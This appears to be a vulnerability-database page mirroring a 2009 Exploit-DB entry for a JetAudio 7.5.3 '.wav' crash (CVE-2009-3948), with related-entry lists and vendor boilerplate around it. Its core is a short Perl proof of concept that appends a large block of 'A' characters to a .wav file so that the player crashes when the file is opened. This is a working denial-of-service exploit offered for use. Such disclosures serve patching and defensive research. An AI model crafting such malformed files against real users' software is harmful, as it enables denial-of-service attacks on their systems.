Lucene search
+L

JetAudio 7.5.3 COWON Media Center - '.wav' Crash

🗓️ 14 Jul 2009 00:00:00Reported by prodigyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

JetAudio 7.5.3 COWON Media Center '.wav' Crash exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-3948
14 Jul 200900:00
circl
CVE
CVE-2009-3948
16 Nov 200920:00
cve
Cvelist
CVE-2009-3948
16 Nov 200920:00
cvelist
EUVD
EUVD-2009-3919
7 Oct 202500:30
euvd
NVD
CVE-2009-3948
16 Nov 200920:30
nvd
OpenVAS
COWON Media Center JetAudio .wav File Denial Of Service Vulnerability
20 Nov 200900:00
openvas
OpenVAS
COWON Media Center JetAudio .wav File Denial Of Service Vulnerability
20 Nov 200900:00
openvas
Prion
Code injection
16 Nov 200920:30
prion
#!/usr/bin/perl -w
#
# JetAudio 7.5.3 COWON Media Center(.WAV file) Memory Comsumption DoS Exploit
#
# Founded and exploited by prodigy
#
# Vendor: JetAudio
#
# Usage to reproduce the bug: you need a file of recorded music in .wav,and then open it with JetAudio and booom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "c:\filerecorder.wav" #the file must be recorded with music

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-07-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Apr 2017 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 24.3
EPSS0.01868
30